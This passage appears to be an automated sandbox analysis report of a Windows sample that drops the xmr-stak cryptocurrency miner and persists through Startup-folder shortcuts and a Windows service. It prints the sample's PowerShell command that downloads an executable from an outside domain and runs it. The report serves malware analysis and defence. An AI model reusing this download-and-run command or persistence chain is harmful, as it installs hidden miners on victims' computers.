Source: C:\Users\user\Desktop\iaejSdZgD3.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1\CAD2.tmp.bat C:\Users\user\Desktop\iaejSdZgD3.exe'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\Win.exe c:\ProgramData\Win.exe Jump to behavior
Source: C:\ProgramData\Win.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exe 'C:\Users\user~1\AppData\Local\Temp\RarSFX0\setup.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\qswGutmnEr\cfg'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeProcess created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-install'
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\installer.exeProcess created: C:\ProgramData\playersclub\LaunchServ.exe 'C:\ProgramData\playersclub\LaunchServ.exe' '-start'
Source: C:\ProgramData\playersclub\LaunchServ.exeProcess created: C:\ProgramData\playersclub\systemSpawn.exe unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\ProgramData\Win.exeFile written: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\LaunchServ.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
PE file has a high image base, often used for DLLsShow sources
Source: iaejSdZgD3.exeStatic PE information: Image base 0x140000000 > 0x60000000
Uses new MSVCR DllsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: vcruntime140.amd64.pdbGCTL source: vcruntime140.dll.6.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Win.exe, 00000005.00000000.14289470007.000000013FEA4000.00000002.sdmp
Source: Binary string: I:\Ross\workspace\PTHREADS.sourceware.org\pthreads.2\pthreadVC2.pdb source: pthreadVC2.dll.6.dr
Source: Binary string: vcruntime140.amd64.pdb source: vcruntime140.dll.6.dr
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.14283518510.0000000002670000.00000002.sdmp

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeCode function: 0_2_0000000140004B58 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0000000140004B58
File is packed with WinRarShow sources
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6097296Jump to behavior
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00492495 push ecx; ret 6_2_004924A8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0045D7CC push esp; iretd 6_2_0045D7CD
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00405D30 push eax; ret 12_2_00405D5E
Sample is packed with UPXShow sources
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command '(new-object System.Net.WebClient).DownloadFile('http://xmrminingpro.com/Start_me.exe', 'c:\ProgramData\Win.exe')'Jump to behavior
Drops PE filesShow sources
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\Process.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\xmr-stak.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\player.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\cudart64_80.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libwinpthread-1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeFile created: C:\ProgramData\qswGutmnEr\Silent.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_cuda_backend.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\installer.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmrstak_opencl_backend.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\zlib1.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\player.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libcurl-4.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libiconv-2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\ssleay32.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\paexec.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\cudart64_80.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\ssleay32.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\Silent.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\runProcesses.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\xmr-stak.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libeay32.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcp140.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libiconv-2.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Win.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libintl-8.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\xmrstak_opencl_backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libcurl-4.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\msvcp140.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libeay32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\paexec.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\systemSpawn.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\pthreadVC2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\LaunchServ.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libidn-11.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\xmrstak_cuda_backend.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\setup.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libintl-8.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\libidn-11.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libwinpthread-1.dllJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\systemSpawn.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\msvcr100.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\runProcesses.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\pthreadVC2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\msvcr100.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\Process.exeJump to dropped file
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\LaunchServ.exeJump to dropped file
Drops PE files to the application program directory (C:\ProgramData)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Win.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\xmr-stak.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\xmrstak_opencl_backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libcurl-4.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\msvcp140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\player.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\paexec.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exeFile created: C:\ProgramData\qswGutmnEr\Silent.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\LaunchServ.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libidn-11.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\xmrstak_cuda_backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libintl-8.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\vcruntime140.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libiconv-2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\ssleay32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libwinpthread-1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\cudart64_80.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\systemSpawn.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\libeay32.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\runProcesses.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\pthreadVC2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\msvcr100.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\Process.exeJump to dropped file
Creates license or readme fileShow sources
Source: C:\ProgramData\Win.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0\pcdata\readme.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeFile created: C:\ProgramData\playersclub\readme.txtJump to behavior

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\ProgramData\Win.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat.lnkJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\ProgramData\Win.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat.lnkJump to behavior
Source: C:\ProgramData\Win.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win_service.lnkJump to behavior
Contains functionality to start windows servicesShow sources
Source: C:\ProgramData\playersclub\LaunchServ.exeCode function: 12_2_00401B19 GetModuleFileNameA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,LoadStringA,OpenSCManagerA,CreateServiceA,LoadStringA,CloseServiceHandle,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,LoadStringA,MessageBoxA,LoadStringA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CreateThread,StartServiceCtrlDispatcherA,LoadStringA,LoadStringA,MessageBoxA,12_2_00401B19

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00478000 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,6_2_00478000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00478130 GetWindowThreadProcessId,GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,6_2_00478130
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_004373F0 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongW,GetModuleHandleW,GetProcAddress,6_2_004373F0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00451490 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,6_2_00451490
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0045E580 MulDiv,MulDiv,MulDiv,_wcschr,__wcsicoll,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,_wcschr,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,MulDiv,MulDiv,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetWindowLongW,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,CreateWindowExW,CreateWindowExW,CreateWindowExW,CreateWindowExW,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,CreateWindowExW,CreateWindowExW,SendMessageW,SendMessageW,MulDiv,MulDiv,MulDiv,MoveWindow,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,SetWindowPos,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,S6_2_0045E580
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0043B6E0 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,EnumChildWindows,GetClassNameW,EnumChildWindows,6_2_0043B6E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00461740 GetWindowLongW,GetWindowLongW,GetWindowLongW,__wcsicoll,SetWindowPos,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,EnableWindow,__wcsicoll,__wcsicoll,__wcsicoll,MulDiv,MulDiv,MulDiv,MulDiv,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,IsWindow,SetParent,SetWindowLongW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,6_2_00461740
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_0043A840 SendMessageW,SendMessageW,SendMessageW,IsWindowVisible,ShowWindow,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,6_2_0043A840
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00438890 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,6_2_00438890
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00475920 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,6_2_00475920
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00475980 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,6_2_00475980
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00464AC0 SetWindowTextW,IsZoomed,IsIconic,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,6_2_00464AC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00464AC0 SetWindowTextW,IsZoomed,IsIconic,MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,6_2_00464AC0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00468B40 SendMessageW,SendMessageW,SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,6_2_00468B40
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\iaejSdZgD3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\iaejSdZgD3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
